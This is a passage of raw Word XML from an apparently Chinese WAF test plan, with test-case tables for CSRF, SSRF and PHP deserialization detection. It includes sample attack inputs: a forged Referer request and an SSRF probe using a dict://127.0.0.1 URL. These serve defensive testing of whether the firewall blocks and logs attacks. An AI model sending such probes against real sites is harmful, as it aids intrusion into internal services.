        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc21077797"/>
      <w:bookmarkStart w:id="49" w:name="_Toc81916100"/>
      <w:bookmarkStart w:id="50" w:name="_Toc802643986"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r>
        <w:t>攻击</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
      <w:bookmarkEnd w:id="49"/>
      <w:bookmarkEnd w:id="50"/>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29AEB91">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="5AFA4785">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="4E9699E6">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>CSRF攻击检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6C03588E">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="0C4BD971">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="54E18DA2">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">跨站请求伪造(Cross-Site Request Forgery，CSRF)是一种使已登录用户在不知情 的情况下执行某种动作的攻击。因为攻击者看不到伪造请求的响应结果，所以CSRF攻击主要 用来执行动作，而非窃取用户数据。当受害者是一个普通用户时，CSRF可以在其不知情的情 况下实现转移资金、发送邮件等操作;但当如果受害者是一个具有管理员权限的用户时， CSRF就可能威胁到整个Web系统的安全。 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4BCE505B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="576932E6">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="79D2905F">
            <w:pPr>
              <w:pStyle w:val="148"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>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1DF97F28">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将W</w:t>
            </w:r>
            <w:r>
              <w:t>EB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量牵引至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="078FD190">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在客户端构造请求，比如用浏览器访问如下链接：</w:t>
            </w:r>
            <w:r>
              <w:t>http://www.site.com/add?content=hello&amp;user=hello</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33674559">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用BurpSuite拦截请求并添加Re</w:t>
            </w:r>
            <w:r>
              <w:t>ferer</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>字段：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BDC3E7A">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:left="360" w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Re</w:t>
            </w:r>
            <w:r>
              <w:t>ferer: http://www.qq.com/abc.html</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B558B4F">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>查看W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是否对攻击进行拦截并记录攻击日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1FED9C00">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="44ED9A3C">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="6A42CE34">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>有效识别攻击，拦截攻击流量并记录攻击日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="222ED35C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="7986702E">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>判定结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="358AA027">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29C0F711">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="796F2611">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="38145C7A">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="002C895E">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="479E94D8">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6AD30BCF">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D78ECBA">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc21077798"/>
      <w:bookmarkStart w:id="52" w:name="_Toc81916101"/>
      <w:bookmarkStart w:id="53" w:name="_Toc1692685895"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSRF</w:t>
      </w:r>
      <w:r>
        <w:t>攻击</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
      <w:bookmarkEnd w:id="52"/>
      <w:bookmarkEnd w:id="53"/>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65F3336D">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="631E5E08">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="1F0A372B">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>SSRF攻击检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="38843867">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="3E08CF63">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="7308ED4B">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>服务器端请求伪造(Server-Side Request Forgery，SSRF)允许攻击者使用目标服 务器来代表攻击者自己执行HTTP请求，这和CSRF类似，因为两个漏洞都在不被受害者察觉 的情况下执行了HTTP请求。只不过在SSRF中，受害者是漏洞服务器，而在CSRF中，它是 用户的浏览器。一般情况下，SSRF攻击的对象是从外网无法访问的内部系统。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6781556D">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="43749F4F">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="6C107602">
            <w:pPr>
              <w:pStyle w:val="148"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>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4E8C2289">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将W</w:t>
            </w:r>
            <w:r>
              <w:t>EB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量牵引至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7115CCB1">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在客户端构造请求，比如用浏览器访问如下链接：</w:t>
            </w:r>
            <w:r>
              <w:t>http://www.site.com/index.php?bslotes=dict://127.0.0.1:80</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C5A83DB">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>查看W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是否对攻击进行拦截并记录攻击日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0DA334FD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="67B733F3">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="7A50ED0E">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81" name="Picture 385164381"/>
                  <wp:cNvGraphicFramePr>
                    <a:graphicFrameLocks noChangeAspect="1"/>
                  </wp:cNvGraphicFramePr>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="ssrf_event_af41f2f040ba4799a2ce01ccdba9b68b_basic_20260515_134316.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId29"/>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82" name="Picture 385164382"/>
                  <wp:cNvGraphicFramePr>
                    <a:graphicFrameLocks noChangeAspect="1"/>
                  </wp:cNvGraphicFramePr>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="ssrf_event_af41f2f040ba4799a2ce01ccdba9b68b_detail_20260515_134316.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId30"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4114800" cy="2314575"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="69A6B83C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="49348DF9">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>判定结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="00376EE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5731F98A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="3BF6BC9A">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="03AE29E7">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4B8A411C">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="11F09FDF">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="333F0092">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1305A7ED">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc21077799"/>
      <w:bookmarkStart w:id="55" w:name="_Toc81916102"/>
      <w:bookmarkStart w:id="56" w:name="_Toc1255965456"/>
      <w:r>
        <w:t>PHP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反序列化</w:t>
      </w:r>
      <w:r>
        <w:t>攻击</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
      <w:bookmarkEnd w:id="55"/>
      <w:bookmarkEnd w:id="56"/>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05166B3">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="5B07DC21">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="5794BE32">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>P</w:t>
            </w:r>
            <w:r>
              <w:t>HP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>反序列化攻击检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6E9C3F86">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="4DDD8F08">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="47C513FA">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>PHP应用中对数据做了反序列化处理，攻击者通过构造恶意输入，让反序列化产生非预期行为，导致攻击者控制反序列化后的对象属性从而实现最终的攻击。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1FE2EC79">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
